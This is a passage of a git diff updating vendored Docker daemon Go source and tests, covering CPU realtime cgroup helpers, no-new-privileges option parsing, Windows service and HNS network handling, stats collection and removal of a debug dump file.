+	return maybeCreateCPURealTimeFile(sysinfo.CPURealtimeRuntime, daemon.configStore.CPURealtimeRuntime, "cpu.rt_runtime_us", path)
+}
+
+func maybeCreateCPURealTimeFile(sysinfoPresent bool, configValue int64, file string, path string) error {
+	if sysinfoPresent && configValue != 0 {
+		if err := os.MkdirAll(path, 0755); err != nil {
 			return err
 		}
-		if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_runtime_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimeRuntime, 10)), 0700); err != nil {
+		if err := ioutil.WriteFile(filepath.Join(path, file), []byte(strconv.FormatInt(configValue, 10)), 0700); err != nil {
 			return err
 		}
 	}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go
index 6250d359e3..36c6030988 100644
--- a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go
+++ b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go
@@ -1,21 +1,56 @@
-// +build !windows,!solaris
+// +build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"errors"
 	"io/ioutil"
 	"os"
-	"path/filepath"
 	"testing"
 
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/volume"
-	"github.com/docker/docker/volume/drivers"
-	"github.com/docker/docker/volume/local"
-	"github.com/docker/docker/volume/store"
+	"github.com/docker/docker/daemon/config"
 )
 
+type fakeContainerGetter struct {
+	containers map[string]*container.Container
+}
+
+func (f *fakeContainerGetter) GetContainer(cid string) (*container.Container, error) {
+	container, ok := f.containers[cid]
+	if !ok {
+		return nil, errors.New("container not found")
+	}
+	return container, nil
+}
+
+// Unix test as uses settings which are not available on Windows
+func TestAdjustSharedNamespaceContainerName(t *testing.T) {
+	fakeID := "abcdef1234567890"
+	hostConfig := &containertypes.HostConfig{
+		IpcMode:     containertypes.IpcMode("container:base"),
+		PidMode:     containertypes.PidMode("container:base"),
+		NetworkMode: containertypes.NetworkMode("container:base"),
+	}
+	containerStore := &fakeContainerGetter{}
+	containerStore.containers = make(map[string]*container.Container)
+	containerStore.containers["base"] = &container.Container{
+		ID: fakeID,
+	}
+
+	adaptSharedNamespaceContainer(containerStore, hostConfig)
+	if hostConfig.IpcMode != containertypes.IpcMode("container:"+fakeID) {
+		t.Errorf("Expected IpcMode to be container:%s", fakeID)
+	}
+	if hostConfig.PidMode != containertypes.PidMode("container:"+fakeID) {
+		t.Errorf("Expected PidMode to be container:%s", fakeID)
+	}
+	if hostConfig.NetworkMode != containertypes.NetworkMode("container:"+fakeID) {
+		t.Errorf("Expected NetworkMode to be container:%s", fakeID)
+	}
+}
+
 // Unix test as uses settings which are not available on Windows
 func TestAdjustCPUShares(t *testing.T) {
 	tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-")
@@ -179,10 +214,39 @@ func TestParseSecurityOpt(t *testing.T) {
 	}
 }
 
+func TestParseNNPSecurityOptions(t *testing.T) {
+	daemon := &Daemon{
+		configStore: &config.Config{NoNewPrivileges: true},
+	}
+	container := &container.Container{}
+	config := &containertypes.HostConfig{}
+
+	// test NNP when "daemon:true" and "no-new-privileges=false""
+	config.SecurityOpt = []string{"no-new-privileges=false"}
+
+	if err := daemon.parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected daemon.parseSecurityOpt error: %v", err)
+	}
+	if container.NoNewPrivileges {
+		t.Fatalf("container.NoNewPrivileges should be FALSE: %v", container.NoNewPrivileges)
+	}
+
+	// test NNP when "daemon:false" and "no-new-privileges=true""
+	daemon.configStore.NoNewPrivileges = false
+	config.SecurityOpt = []string{"no-new-privileges=true"}
+
+	if err := daemon.parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected daemon.parseSecurityOpt error: %v", err)
+	}
+	if !container.NoNewPrivileges {
+		t.Fatalf("container.NoNewPrivileges should be TRUE: %v", container.NoNewPrivileges)
+	}
+}
+
 func TestNetworkOptions(t *testing.T) {
 	daemon := &Daemon{}
-	dconfigCorrect := &Config{
-		CommonConfig: CommonConfig{
+	dconfigCorrect := &config.Config{
+		CommonConfig: config.CommonConfig{
 			ClusterStore:     "consul://localhost:8500",
 			ClusterAdvertise: "192.168.0.1:8000",
 		},
@@ -192,92 +256,13 @@ func TestNetworkOptions(t *testing.T) {
 		t.Fatalf("Expect networkOptions success, got error: %v", err)
 	}
 
-	dconfigWrong := &Config{
-		CommonConfig: CommonConfig{
+	dconfigWrong := &config.Config{
+		CommonConfig: config.CommonConfig{
 			ClusterStore: "consul://localhost:8500://test://bbb",
 		},
 	}
 
 	if _, err := daemon.networkOptions(dconfigWrong, nil, nil); err == nil {
-		t.Fatalf("Expected networkOptions error, got nil")
-	}
-}
-
-func TestMigratePre17Volumes(t *testing.T) {
-	rootDir, err := ioutil.TempDir("", "test-daemon-volumes")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(rootDir)
-
-	volumeRoot := filepath.Join(rootDir, "volumes")
-	err = os.MkdirAll(volumeRoot, 0755)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	containerRoot := filepath.Join(rootDir, "containers")
-	cid := "1234"
-	err = os.MkdirAll(filepath.Join(containerRoot, cid), 0755)
-
-	vid := "5678"
-	vfsPath := filepath.Join(rootDir, "vfs", "dir", vid)
-	err = os.MkdirAll(vfsPath, 0755)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	config := []byte(`
-		{
-			"ID": "` + cid + `",
-			"Volumes": {
-				"/foo": "` + vfsPath + `",
-				"/bar": "/foo",
-				"/quux": "/quux"
-			},
-			"VolumesRW": {
-				"/foo": true,
-				"/bar": true,
-				"/quux": false
-			}
-		}
-	`)
-
-	volStore, err := store.New(volumeRoot)
-	if err != nil {
-		t.Fatal(err)
-	}
-	drv, err := local.New(volumeRoot, 0, 0)
-	if err != nil {
-		t.Fatal(err)
-	}
-	volumedrivers.Register(drv, volume.DefaultDriverName)
-
-	daemon := &Daemon{root: rootDir, repository: containerRoot, volumes: volStore}
-	err = ioutil.WriteFile(filepath.Join(containerRoot, cid, "config.v2.json"), config, 600)
-	if err != nil {
-		t.Fatal(err)
-	}
-	c, err := daemon.load(cid)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if err := daemon.verifyVolumesInfo(c); err != nil {
-		t.Fatal(err)
-	}
-
-	expected := map[string]volume.MountPoint{
-		"/foo":  {Destination: "/foo", RW: true, Name: vid},
-		"/bar":  {Source: "/foo", Destination: "/bar", RW: true},
-		"/quux": {Source: "/quux", Destination: "/quux", RW: false},
-	}
-	for id, mp := range c.MountPoints {
-		x, exists := expected[id]
-		if !exists {
-			t.Fatal("volume not migrated")
-		}
-		if mp.Source != x.Source || mp.Destination != x.Destination || mp.RW != x.RW || mp.Name != x.Name {
-			t.Fatalf("got unexpected mountpoint, expected: %+v, got: %+v", x, mp)
-		}
+		t.Fatal("Expected networkOptions error, got nil")
 	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go
index cb1acf63d6..ee680b6411 100644
--- a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go
@@ -1,5 +1,5 @@
-// +build !linux,!freebsd,!windows,!solaris
+// +build !linux,!freebsd,!windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 const platformSupported = false
diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows.go b/vendor/github.com/docker/docker/daemon/daemon_windows.go
index 51ad68b357..1f801032df 100644
--- a/vendor/github.com/docker/docker/daemon/daemon_windows.go
+++ b/vendor/github.com/docker/docker/daemon/daemon_windows.go
@@ -1,16 +1,18 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
-	"os"
+	"path/filepath"
 	"strings"
 
 	"github.com/Microsoft/hcsshim"
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/image"
+	"github.com/docker/docker/daemon/config"
+	"github.com/docker/docker/pkg/containerfs"
+	"github.com/docker/docker/pkg/fileutils"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/parsers"
 	"github.com/docker/docker/pkg/platform"
@@ -23,8 +25,10 @@ import (
 	winlibnetwork "github.com/docker/libnetwork/drivers/windows"
 	"github.com/docker/libnetwork/netlabel"
 	"github.com/docker/libnetwork/options"
-	blkiodev "github.com/opencontainers/runc/libcontainer/configs"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 	"golang.org/x/sys/windows"
+	"golang.org/x/sys/windows/svc/mgr"
 )
 
 const (
@@ -34,34 +38,22 @@ const (
 	windowsMaxCPUShares  = 10000
 	windowsMinCPUPercent = 1
 	windowsMaxCPUPercent = 100
-	windowsMinCPUCount   = 1
 )
 
-func getBlkioWeightDevices(config *containertypes.HostConfig) ([]blkiodev.WeightDevice, error) {
-	return nil, nil
+// Windows has no concept of an execution state directory. So use config.Root here.
+func getPluginExecRoot(root string) string {
+	return filepath.Join(root, "plugins")
 }
 
-func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error {
-	return nil
-}
-
-func getBlkioReadIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
-	return nil, nil
-}
-
-func getBlkioWriteIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
-	return nil, nil
-}
-
-func getBlkioReadBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
-	return nil, nil
+func (daemon *Daemon) parseSecurityOpt(container *container.Container, hostConfig *containertypes.HostConfig) error {
+	return parseSecurityOpt(container, hostConfig)
 }
 
-func getBlkioWriteBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
-	return nil, nil
+func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error {
+	return nil
 }
 
-func (daemon *Daemon) getLayerInit() func(string) error {
+func setupInitLayer(idMappings *idtools.IDMappings) func(containerfs.ContainerFS) error {
 	return nil
 }
 
@@ -85,7 +77,7 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf
 
 func verifyContainerResources(resources *containertypes.Resources, isHyperv bool) ([]string, error) {
 	warnings := []string{}
-
+	fixMemorySwappiness(resources)
 	if !isHyperv {
 		// The processor resource controls are mutually exclusive on
 		// Windows Server Containers, the order of precedence is
@@ -132,6 +124,17 @@ func verifyContainerResources(resources *containertypes.Resources, isHyperv bool
 		return warnings, fmt.Errorf("range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU())
 	}
 
+	osv := system.GetOSVersion()
+	if resources.NanoCPUs > 0 && isHyperv && osv.Build < 16175 {
+		leftoverNanoCPUs := resources.NanoCPUs % 1e9
+		if leftoverNanoCPUs != 0 && resources.NanoCPUs > 1e9 {
+			resources.NanoCPUs = ((resources.NanoCPUs + 1e9/2) / 1e9) * 1e9
+			warningString := fmt.Sprintf("Your current OS version does not support Hyper-V containers with NanoCPUs greater than 1000000000 but not divisible by 1000000000. NanoCPUs rounded to %d", resources.NanoCPUs)
+			warnings = append(warnings, warningString)
+			logrus.Warn(warningString)
+		}
+	}
+
 	if len(resources.BlkioDeviceReadBps) > 0 {
 		return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadBps")
 	}
@@ -171,7 +174,7 @@ func verifyContainerResources(resources *containertypes.Resources, isHyperv bool
 	if resources.MemorySwap != 0 {
 		return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwap")
 	}
-	if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 {
+	if resources.MemorySwappiness != nil {
 		return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwappiness")
 	}
 	if resources.OomKillDisable != nil && *resources.OomKillDisable {
@@ -192,7 +195,7 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.
 	warnings := []string{}
 
 	hyperv := daemon.runAsHyperVContainer(hostConfig)
-	if !hyperv && system.IsWindowsClient() {
+	if !hyperv && system.IsWindowsClient() && !system.IsIoTCore() {
 		// @engine maintainers. This block should not be removed. It partially enforces licensing
 		// restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this.
 		return warnings, fmt.Errorf("Windows client operating systems only support Hyper-V containers")
@@ -200,19 +203,11 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.
 
 	w, err := verifyContainerResources(&hostConfig.Resources, hyperv)
 	warnings = append(warnings, w...)
-	if err != nil {
-		return warnings, err
-	}
-	return warnings, nil
-}
-
-// platformReload update configuration with platform specific options
-func (daemon *Daemon) platformReload(config *Config) map[string]string {
-	return map[string]string{}
+	return warnings, err
 }
 
 // verifyDaemonSettings performs validation of daemon config struct
-func verifyDaemonSettings(config *Config) error {
+func verifyDaemonSettings(config *config.Config) error {
 	return nil
 }
 
@@ -230,22 +225,46 @@ func checkSystem() error {
 
 	vmcompute := windows.NewLazySystemDLL("vmcompute.dll")
 	if vmcompute.Load() != nil {
-		return fmt.Errorf("Failed to load vmcompute.dll. Ensure that the Containers role is installed.")
+		return fmt.Errorf("failed to load vmcompute.dll, ensure that the Containers feature is installed")
+	}
+
+	// Ensure that the required Host Network Service and vmcompute services
+	// are running. Docker will fail in unexpected ways if this is not present.
+	var requiredServices = []string{"hns", "vmcompute"}
+	if err := ensureServicesInstalled(requiredServices); err != nil {
+		return errors.Wrap(err, "a required service is not installed, ensure the Containers feature is installed")
+	}
+
+	return nil
+}
+
+func ensureServicesInstalled(services []string) error {
+	m, err := mgr.Connect()
+	if err != nil {
+		return err
+	}
+	defer m.Disconnect()
+	for _, service := range services {
+		s, err := m.OpenService(service)
+		if err != nil {
+			return errors.Wrapf(err, "failed to open service %s", service)
+		}
+		s.Close()
 	}
 	return nil
 }
 
 // configureKernelSecuritySupport configures and validate security support for the kernel
-func configureKernelSecuritySupport(config *Config, driverName string) error {
+func configureKernelSecuritySupport(config *config.Config, driverName string) error {
 	return nil
 }
 
 // configureMaxThreads sets the Go runtime max threads threshold
-func configureMaxThreads(config *Config) error {
+func configureMaxThreads(config *config.Config) error {
 	return nil
 }
 
-func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
+func (daemon *Daemon) initNetworkController(config *config.Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
 	netOptions, err := daemon.networkOptions(config, nil, nil)
 	if err != nil {
 		return nil, err
@@ -304,6 +323,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[
 	// discover and add HNS networks to windows
 	// network that exist are removed and added again
 	for _, v := range hnsresponse {
+		if strings.ToLower(v.Type) == "private" {
+			continue // workaround for HNS reporting unsupported networks
+		}
 		var n libnetwork.Network
 		s := func(current libnetwork.Network) bool {
 			options := current.Info().DriverOptions()
@@ -315,6 +337,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[
 		}
 
 		controller.WalkNetworks(s)
+
+		drvOptions := make(map[string]string)
+
 		if n != nil {
 			// global networks should not be deleted by local HNS
 			if n.Info().Scope() == datastore.GlobalScope {
@@ -323,14 +348,23 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[
 			v.Name = n.Name()
 			// This will not cause network delete from HNS as the network
 			// is not yet populated in the libnetwork windows driver
+
+			// restore option if it existed before
+			drvOptions = n.Info().DriverOptions()
 			n.Delete()
 		}
-
 		netOption := map[string]string{
 			winlibnetwork.NetworkName: v.Name,
 			winlibnetwork.HNSID:       v.Id,
 		}
 
+		// add persisted driver options
+		for k, v := range drvOptions {
+			if k != winlibnetwork.NetworkName && k != winlibnetwork.HNSID {
+				netOption[k] = v
+			}
+		}
+
 		v4Conf := []*libnetwork.IpamConf{}
 		for _, subnet := range v.Subnets {
 			ipamV4Conf := libnetwork.IpamConf{}
@@ -342,8 +376,10 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[
 		name := v.Name
 
 		// If there is no nat network create one from the first NAT network
-		// encountered
-		if !defaultNetworkExists && runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) {
+		// encountered if it doesn't already exist
+		if !defaultNetworkExists &&
+			runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) &&
+			n == nil {
 			name = runconfig.DefaultDaemonNetworkMode().NetworkName()
 			defaultNetworkExists = true
 		}
@@ -371,7 +407,7 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[
 	return controller, nil
 }
 
-func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error {
+func initBridgeDriver(controller libnetwork.NetworkController, config *config.Config) error {
 	if _, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil {
 		return nil
 	}
@@ -383,8 +419,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e
 	var ipamOption libnetwork.NetworkOption
 	var subnetPrefix string
 
-	if config.bridgeConfig.FixedCIDR != "" {
-		subnetPrefix = config.bridgeConfig.FixedCIDR
+	if config.BridgeConfig.FixedCIDR != "" {
+		subnetPrefix = config.BridgeConfig.FixedCIDR
 	} else {
 		// TP5 doesn't support properly detecting subnet
 		osv := system.GetOSVersion()
@@ -429,14 +465,14 @@ func (daemon *Daemon) cleanupMounts() error {
 	return nil
 }
 
-func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) {
-	return nil, nil, nil
+func setupRemappedRoot(config *config.Config) (*idtools.IDMappings, error) {
+	return &idtools.IDMappings{}, nil
 }
 
-func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error {
+func setupDaemonRoot(config *config.Config, rootDir string, rootIDs idtools.IDPair) error {
 	config.Root = rootDir
 	// Create the root directory if it doesn't exists
-	if err := system.MkdirAllWithACL(config.Root, 0); err != nil && !os.IsExist(err) {
+	if err := system.MkdirAllWithACL(config.Root, 0, system.SddlAdministratorsLocalSystem); err != nil {
 		return err
 	}
 	return nil
@@ -457,7 +493,14 @@ func (daemon *Daemon) runAsHyperVContainer(hostConfig *containertypes.HostConfig
 // conditionalMountOnStart is a platform specific helper function during the
 // container start to call mount.
 func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error {
-	// We do not mount if a Hyper-V container
+	// Bail out now for Linux containers. We cannot mount the containers filesystem on the
+	// host as it is a non-Windows filesystem.
+	if system.LCOWSupported() && container.OS != "windows" {
+		return nil
+	}
+
+	// We do not mount if a Hyper-V container as it needs to be mounted inside the
+	// utility VM, not the host.
 	if !daemon.runAsHyperVContainer(container.HostConfig) {
 		return daemon.Mount(container)
 	}
@@ -467,6 +510,11 @@ func (daemon *Daemon) conditionalMountOnStart(container *container.Container) er
 // conditionalUnmountOnCleanup is a platform specific helper function called
 // during the cleanup of a container to unmount.
 func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error {
+	// Bail out now for Linux containers
+	if system.LCOWSupported() && container.OS != "windows" {
+		return nil
+	}
+
 	// We do not unmount if a Hyper-V container
 	if !daemon.runAsHyperVContainer(container.HostConfig) {
 		return daemon.Unmount(container)
@@ -474,66 +522,68 @@ func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container
 	return nil
 }
 
-func driverOptions(config *Config) []nwconfig.Option {
+func driverOptions(config *config.Config) []nwconfig.Option {
 	return []nwconfig.Option{}
 }
 
 func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) {
 	if !c.IsRunning() {
-		return nil, errNotRunning{c.ID}
+		return nil, errNotRunning(c.ID)
 	}
 
 	// Obtain the stats from HCS via libcontainerd
-	stats, err := daemon.containerd.Stats(c.ID)
+	stats, err := daemon.containerd.Stats(context.Background(), c.ID)
 	if err != nil {
+		if strings.Contains(err.Error(), "container not found") {
+			return nil, containerNotFound(c.ID)
+		}
 		return nil, err
 	}
 
 	// Start with an empty structure
 	s := &types.StatsJSON{}
+	s.Stats.Read = stats.Read
+	s.Stats.NumProcs = platform.NumProcs()
 
-	// Populate the CPU/processor statistics
-	s.CPUStats = types.CPUStats{
-		CPUUsage: types.CPUUsage{
-			TotalUsage:        stats.Processor.TotalRuntime100ns,
-			UsageInKernelmode: stats.Processor.RuntimeKernel100ns,
-			UsageInUsermode:   stats.Processor.RuntimeKernel100ns,
-		},
-	}
-
-	// Populate the memory statistics
-	s.MemoryStats = types.MemoryStats{
-		Commit:            stats.Memory.UsageCommitBytes,
-		CommitPeak:        stats.Memory.UsageCommitPeakBytes,
-		PrivateWorkingSet: stats.Memory.UsagePrivateWorkingSetBytes,
-	}
-
-	// Populate the storage statistics
-	s.StorageStats = types.StorageStats{
-		ReadCountNormalized:  stats.Storage.ReadCountNormalized,
-		ReadSizeBytes:        stats.Storage.ReadSizeBytes,
-		WriteCountNormalized: stats.Storage.WriteCountNormalized,
-		WriteSizeBytes:       stats.Storage.WriteSizeBytes,
-	}
-
-	// Populate the network statistics
-	s.Networks = make(map[string]types.NetworkStats)
-
-	for _, nstats := range stats.Network {
-		s.Networks[nstats.EndpointId] = types.NetworkStats{
-			RxBytes:   nstats.BytesReceived,
-			RxPackets: nstats.PacketsReceived,
-			RxDropped: nstats.DroppedPacketsIncoming,
-			TxBytes:   nstats.BytesSent,
-			TxPackets: nstats.PacketsSent,
-			TxDropped: nstats.DroppedPacketsOutgoing,
+	if stats.HCSStats != nil {
+		hcss := stats.HCSStats
+		// Populate the CPU/processor statistics
+		s.CPUStats = types.CPUStats{
+			CPUUsage: types.CPUUsage{
+				TotalUsage:        hcss.Processor.TotalRuntime100ns,
+				UsageInKernelmode: hcss.Processor.RuntimeKernel100ns,
+				UsageInUsermode:   hcss.Processor.RuntimeKernel100ns,
+			},
 		}
-	}
 
-	// Set the timestamp
-	s.Stats.Read = stats.Timestamp
-	s.Stats.NumProcs = platform.NumProcs()
+		// Populate the memory statistics
+		s.MemoryStats = types.MemoryStats{
+			Commit:            hcss.Memory.UsageCommitBytes,
+			CommitPeak:        hcss.Memory.UsageCommitPeakBytes,
+			PrivateWorkingSet: hcss.Memory.UsagePrivateWorkingSetBytes,
+		}
+
+		// Populate the storage statistics
+		s.StorageStats = types.StorageStats{
+			ReadCountNormalized:  hcss.Storage.ReadCountNormalized,
+			ReadSizeBytes:        hcss.Storage.ReadSizeBytes,
+			WriteCountNormalized: hcss.Storage.WriteCountNormalized,
+			WriteSizeBytes:       hcss.Storage.WriteSizeBytes,
+		}
 
+		// Populate the network statistics
+		s.Networks = make(map[string]types.NetworkStats)
+		for _, nstats := range hcss.Network {
+			s.Networks[nstats.EndpointId] = types.NetworkStats{
+				RxBytes:   nstats.BytesReceived,
+				RxPackets: nstats.PacketsReceived,
+				RxDropped: nstats.DroppedPacketsIncoming,
+				TxBytes:   nstats.BytesSent,
+				TxPackets: nstats.PacketsSent,
+				TxDropped: nstats.DroppedPacketsOutgoing,
+			}
+		}
+	}
 	return s, nil
 }
 
@@ -541,8 +591,9 @@ func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) {
 // daemon to run in. This is only applicable on Windows
 func (daemon *Daemon) setDefaultIsolation() error {
 	daemon.defaultIsolation = containertypes.Isolation("process")
-	// On client SKUs, default to Hyper-V
-	if system.IsWindowsClient() {
+	// On client SKUs, default to Hyper-V. Note that IoT reports as a client SKU
+	// but it should not be treated as such.
+	if system.IsWindowsClient() && !system.IsIoTCore() {
 		daemon.defaultIsolation = containertypes.Isolation("hyperv")
 	}
 	for _, option := range daemon.configStore.ExecOptions {
@@ -561,7 +612,7 @@ func (daemon *Daemon) setDefaultIsolation() error {
 				daemon.defaultIsolation = containertypes.Isolation("hyperv")
 			}
 			if containertypes.Isolation(val).IsProcess() {
-				if system.IsWindowsClient() {
+				if system.IsWindowsClient() && !system.IsIoTCore() {
 					// @engine maintainers. This block should not be removed. It partially enforces licensing
 					// restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this.
 					return fmt.Errorf("Windows client operating systems only support Hyper-V containers")
@@ -577,28 +628,28 @@ func (daemon *Daemon) setDefaultIsolation() error {
 	return nil
 }
 
-func rootFSToAPIType(rootfs *image.RootFS) types.RootFS {
-	var layers []string
-	for _, l := range rootfs.DiffIDs {
-		layers = append(layers, l.String())
-	}
-	return types.RootFS{
-		Type:   rootfs.Type,
-		Layers: layers,
-	}
+func setupDaemonProcess(config *config.Config) error {
+	return nil
 }
 
-func setupDaemonProcess(config *Config) error {
+func (daemon *Daemon) setupSeccompProfile() error {
 	return nil
 }
 
-// verifyVolumesInfo is a no-op on windows.
-// This is called during daemon initialization to migrate volumes from pre-1.7.
-// volumes were not supported on windows pre-1.7
-func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error {
+func getRealPath(path string) (string, error) {
+	if system.IsIoTCore() {
+		// Due to https://github.com/golang/go/issues/20506, path expansion
+		// does not work correctly on the default IoT Core configuration.
+		// TODO @darrenstahlmsft remove this once golang/go/20506 is fixed
+		return path, nil
+	}
+	return fileutils.ReadSymlinkedDirectory(path)
+}
+
+func (daemon *Daemon) loadRuntimes() error {
 	return nil
 }
 
-func (daemon *Daemon) setupSeccompProfile() error {
+func (daemon *Daemon) initRuntimes(_ map[string]types.Runtime) error {
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows_test.go b/vendor/github.com/docker/docker/daemon/daemon_windows_test.go
new file mode 100644
index 0000000000..a4d8b6a20a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_windows_test.go
@@ -0,0 +1,72 @@
+// +build windows
+
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"strings"
+	"testing"
+
+	"golang.org/x/sys/windows/svc/mgr"
+)
+
+const existingService = "Power"
+
+func TestEnsureServicesExist(t *testing.T) {
+	m, err := mgr.Connect()
+	if err != nil {
+		t.Fatal("failed to connect to service manager, this test needs admin")
+	}
+	defer m.Disconnect()
+	s, err := m.OpenService(existingService)
+	if err != nil {
+		t.Fatalf("expected to find known inbox service %q, this test needs a known inbox service to run correctly", existingService)
+	}
+	defer s.Close()
+
+	input := []string{existingService}
+	err = ensureServicesInstalled(input)
+	if err != nil {
+		t.Fatalf("unexpected error for input %q: %q", input, err)
+	}
+}
+
+func TestEnsureServicesExistErrors(t *testing.T) {
+	m, err := mgr.Connect()
+	if err != nil {
+		t.Fatal("failed to connect to service manager, this test needs admin")
+	}
+	defer m.Disconnect()
+	s, err := m.OpenService(existingService)
+	if err != nil {
+		t.Fatalf("expected to find known inbox service %q, this test needs a known inbox service to run correctly", existingService)
+	}
+	defer s.Close()
+
+	for _, testcase := range []struct {
+		input         []string
+		expectedError string
+	}{
+		{
+			input:         []string{"daemon_windows_test_fakeservice"},
+			expectedError: "failed to open service daemon_windows_test_fakeservice",
+		},
+		{
+			input:         []string{"daemon_windows_test_fakeservice1", "daemon_windows_test_fakeservice2"},
+			expectedError: "failed to open service daemon_windows_test_fakeservice1",
+		},
+		{
+			input:         []string{existingService, "daemon_windows_test_fakeservice"},
+			expectedError: "failed to open service daemon_windows_test_fakeservice",
+		},
+	} {
+		t.Run(strings.Join(testcase.input, ";"), func(t *testing.T) {
+			err := ensureServicesInstalled(testcase.input)
+			if err == nil {
+				t.Fatalf("expected error for input %v", testcase.input)
+			}
+			if !strings.Contains(err.Error(), testcase.expectedError) {
+				t.Fatalf("expected error %q to contain %q", err.Error(), testcase.expectedError)
+			}
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap.go b/vendor/github.com/docker/docker/daemon/debugtrap.go
deleted file mode 100644
index 209048b589..0000000000
--- a/vendor/github.com/docker/docker/daemon/debugtrap.go
+++ /dev/null
@@ -1,62 +0,0 @@
-package daemon
-
-import (
-	"fmt"
-	"os"
-	"path/filepath"
-	"strings"
-	"time"
-
-	"github.com/davecgh/go-spew/spew"
-	"github.com/pkg/errors"
-)
-
-const dataStructuresLogNameTemplate = "daemon-data-%s.log"
-
-// dumpDaemon appends the daemon datastructures into file in dir and returns full path
-// to that file.
-func (d *Daemon) dumpDaemon(dir string) (string, error) {
-	// Ensure we recover from a panic as we are doing this without any locking
-	defer func() {
-		recover()
-	}()
-
-	path := filepath.Join(dir, fmt.Sprintf(dataStructuresLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1)))
-	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666)
-	if err != nil {
-		return "", errors.Wrap(err, "failed to open file to write the daemon datastructure dump")
-	}
-	defer f.Close()
-
-	dump := struct {
-		containers      interface{}
-		names           interface{}
-		links           interface{}
-		execs           interface{}
-		volumes         interface{}
-		images          interface{}
-		layers          interface{}
-		imageReferences interface{}
-		downloads       interface{}
-		uploads         interface{}
-		registry        interface{}
-		plugins         interface{}
-	}{
-		containers:      d.containers,
-		execs:           d.execCommands,
-		volumes:         d.volumes,
-		images:          d.imageStore,
-		layers:          d.layerStore,
-		imageReferences: d.referenceStore,
-		downloads:       d.downloadManager,
-		uploads:         d.uploadManager,
-		registry:        d.RegistryService,
-		plugins:         d.PluginStore,
-		names:           d.nameIndex,
-		links:           d.linkIndex,
-	}
-
-	spew.Fdump(f, dump) // Does not return an error
-	f.Sync()
-	return path, nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go
index d650eb7f8c..c8abe69bb6 100644
--- a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go
